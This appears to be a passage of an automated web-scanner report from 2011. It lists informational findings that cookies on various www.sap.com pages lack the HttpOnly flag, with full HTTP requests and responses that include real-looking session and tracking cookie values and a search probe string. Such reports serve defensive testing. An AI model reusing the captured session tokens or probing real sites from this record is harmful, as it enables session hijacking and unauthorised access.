Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fpub%2fwlg%2f26917; mbox=session#1318688512533-813903#1318690710|check#true#1318688910; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690649534%3B%20pe%3Dno%2520value%7C1318690649536%3B%20c3%3Dscn%253Ablog%253Abrian%2520bernard%253Atune%2520in%2520to%2520sap%2520teched%2520live%2521%7C1318690649538%3B%20s_nr%3D1318688849551-New%7C1321280849551%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292449554%3B%20s_visit%3D1%7C1318690649555%3B%20gpv_p47%3Dno%2520value%7C1318690649557%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D4%3B%20s_sq%3D%3B; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:29:25 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:29:25 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:29:24 GMT
Content-Length: 48825


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script language
...[SNIP]...
12.85. http://www.sap.com/sme/partners/findpartner/index.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /sme/partners/findpartner/index.epx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sme/partners/findpartner/index.epx HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Aforums%7C1318690514391%3B%20pe%3Dno%2520value%7C1318690514393%3B%20c3%3Dno%2520value%7C1318690514395%3B%20s_nr%3D1318688714402-New%7C1321280714402%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292314404%3B%20s_visit%3D1%7C1318690514405%3B%20gpv_p47%3Dno%2520value%7C1318690514407%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D3%3B%20s_sq%3D%3B; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapphirenow.com%2flogin.aspx%3fReturnUrl%3d%2fdefault.aspx; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; mbox=session#1318688512533-813903#1318690682|check#true#1318688882

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:27:02 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:27:02 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 14:27:02 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:27:02 GMT
Content-Length: 50382


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script language
...[SNIP]...
12.86. http://www.sap.com/sme/search/SAP_nn6.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /sme/search/SAP_nn6.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sme/search/SAP_nn6.js HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sap.com/sme/search/index.epx?q1=xss+sqli+httpi+111+222+333+444+555
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fpub%2fwlg%2f26917; mbox=session#1318688512533-813903#1318690710|check#true#1318688910; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690649534%3B%20pe%3Dno%2520value%7C1318690649536%3B%20c3%3Dscn%253Ablog%253Abrian%2520bernard%253Atune%2520in%2520to%2520sap%2520teched%2520live%2521%7C1318690649538%3B%20s_nr%3D1318688849551-New%7C1321280849551%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292449554%3B%20s_visit%3D1%7C1318690649555%3B%20gpv_p47%3Dno%2520value%7C1318690649557%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D4%3B%20s_sq%3D%3B; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 43787
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:28:20 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:28:20 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:28:20 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
12.87. http://www.sap.com/sme/search/index.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /sme/search/index.epx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sme/search/index.epx?q1=xss+sqli+httpi+111+222+333+444+555 HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sap.com/sme/partners/findpartner/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fpub%2fwlg%2f26917; mbox=session#1318688512533-813903#1318690710|check#true#1318688910; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690649534%3B%20pe%3Dno%2520value%7C1318690649536%3B%20c3%3Dscn%253Ablog%253Abrian%2520bernard%253Atune%2520in%2520to%2520sap%2520teched%2520live%2521%7C1318690649538%3B%20s_nr%3D1318688849551-New%7C1321280849551%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292449554%3B%20s_visit%3D1%7C1318690649555%3B%20gpv_p47%3Dno%2520value%7C1318690649557%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D4%3B%20s_sq%3D%3B; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:28:18 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:28:18 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 14:28:18 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:28:18 GMT
Content-Length: 47227


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script language
...[SNIP]...
12.88. http://www.sap.com/sme/seeitinaction/customerreferences.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /sme/seeitinaction/customerreferences.epx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sme/seeitinaction/customerreferences.epx HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 76575
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:03:26 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:03:26 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:03:36 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script language
...[SNIP]...
12.89. http://www.sap.com/sme/seeitinaction/index.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /sme/seeitinaction/index.epx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sme/seeitinaction/index.epx HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 54470
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:03:13 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:03:13 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|INDUSTRY=INDA000018,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 15:03:13 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:03:20 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script language
...[SNIP]...
12.90. http://www.sap.com/sme/seeitinaction/overviewvideos.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /sme/seeitinaction/overviewvideos.epx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sme/seeitinaction/overviewvideos.epx HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 85841
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:03:19 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:03:19 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:03:21 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script language
...[SNIP]...
12.91. http://www.sap.com/sme/seeitinaction/seealldemos.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /sme/seeitinaction/seealldemos.epx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sme/seeitinaction/seealldemos.epx HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 86391
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:03:16 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:03:16 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:03:16 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script language
...[SNIP]...
12.92. http://www.sap.com/sme/seeitinaction/solutiondemos.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /sme/seeitinaction/solutiondemos.epx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sme/seeitinaction/solutiondemos.epx HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 65712
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:03:21 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:03:21 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:03:25 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script language
...[SNIP]...
12.93. http://www.sap.com/sme/solutions/businessmanagement/index.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /sme/solutions/businessmanagement/index.epx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sme/solutions/businessmanagement/index.epx HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; mbox=session#1318688512533-813903#1318690473|check#true#1318688673; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; SAP_SCORING_COOKIE=SOLUTION=BARB002004,9|SOLUTION=BARB003001,9|; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:23:51 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:23:51 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 14:23:51 GMT; path=/
Set-Cookie: SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM; domain=.sap.com; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:23:51 GMT
Content-Length: 53309


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script language
...[SNIP]...
12.94. http://www.sap.com/solutions/business-suite/scm/featuresfunctions/execution/transportationmanagement.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /solutions/business-suite/scm/featuresfunctions/execution/transportationmanagement.epx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /solutions/business-suite/scm/featuresfunctions/execution/transportationmanagement.epx HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 57693
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:01:54 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:01:54 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|INDUSTRY=INDA000018,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 15:01:54 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:01:54 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
12.95. http://www.sap.com/solutions/products/sales-on-demand/index.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /solutions/products/sales-on-demand/index.epx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /solutions/products/sales-on-demand/index.epx HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 22650
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:01:56 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:01:56 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|INDUSTRY=INDA000018,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 15:01:56 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:01:55 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!--[if IE 6 ]> <html xml:lang="en" lang="en" class="ie6" xmlns="http://www.w3.org/19
...[SNIP]...
12.96. http://www.sap.com/solutions/products/sap-bydesign/index.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /solutions/products/sap-bydesign/index.epx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /solutions/products/sap-bydesign/index.epx HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 24435
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:01:56 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:01:56 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|INDUSTRY=INDA000018,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 15:01:56 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:01:55 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!--[if IE 6 ]> <html xml:lang="en" lang="en" class="ie6" xmlns="http://www.w3.org/19
...[SNIP]...
12.97. http://www.sap.com/solutions/rapid-deployment/index.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /solutions/rapid-deployment/index.epx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /solutions/rapid-deployment/index.epx HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 23462
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
